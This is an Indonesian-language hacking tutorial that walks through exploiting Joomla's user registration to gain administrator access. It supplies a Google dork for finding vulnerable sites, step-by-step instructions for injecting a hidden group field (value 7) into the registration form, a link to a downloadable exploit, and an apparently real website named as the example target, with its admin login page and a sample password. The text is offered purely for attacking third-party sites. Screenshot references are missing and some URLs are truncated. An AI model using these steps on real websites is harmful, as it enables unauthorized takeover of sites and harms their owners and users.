Tutorial Exploite COM_USER FULL STEP
Dork : inurl:/index.php?option=com_users&view=registration
Exploite : index.php?option=com_users&view=registration
Contoh website :
nah setelah kita masukin dork nah kita liat cara mencari vulnnya kak
<--- Ini Tanda Gak Vuln Kenapa gak Vuln ?
Karena Garisnya Jauh dari form Login Admin
<--- Ini Vuln Kak Kenapa Vuln ?
Karena Garisnya Dekat Dengan Form Login Admininistrator
Maka nanti kita akan Exploit dengan menambahkan site.com/index.php?option=com_users&view=registration Atau site.com/[patch]/index.php?option=com_users&view=registration <----
http://www.mediafire.com/download/u8ddva...36y/x.html <--- Ini aku kasih Link Exploit Joomla
cara Melihat Token
<--- nah ini mencari tokennyaLangsung kita mulai1. Cari web target di Google.com dengan memasukkan Dork berikut:
inurl:/index.php?option=com_users&view=registration
2. Pilih target sobat, lalu masukin exploit berikut:
index.php?option=com_users&view=registration
3. Ane disini mengambil contoh:
http://depokterkini.co/index.php?option=...gistration
4. kemudian ane ganti menjadi:
http://depokterkini.co/index.php?option=...gistration
5. Setelah Itu Anda Download Aplikasi Firebug
6. Setelah itu Daftar Menggunakan USer atau Password Yang Kalian Inginkan Tetapi Password pendaftaran yang pertama harus berbeda dan harus di Exploit Menggunakan exploit > <input name="jform[groups][]" value="7" />
Liat ss
7. Setelah Itu Masukin Exploit Yang Tadi >>>>> <input name="jform[groups][]" value="7" /> <<<<<<< Dan Masukin Email ANda
Setelah Itu Klik Register
8. Bila Bacaan Kaya Gini Kita Harus Mengasih Password Yang Sama Misalkan 1234 Dan Klik Register
9. Setelah Itu Kita Cek Email Kita Dan Kita Buka Link Pendaftaran yang tadi ^_^
10. Setelah Itu Kita Klik Link Yang saya Lingkari Tersebut Dan Langsung Login Ke Halaman Adminnya
http://depokterkini.co/administrator
coba
1234
Goodluck!!!
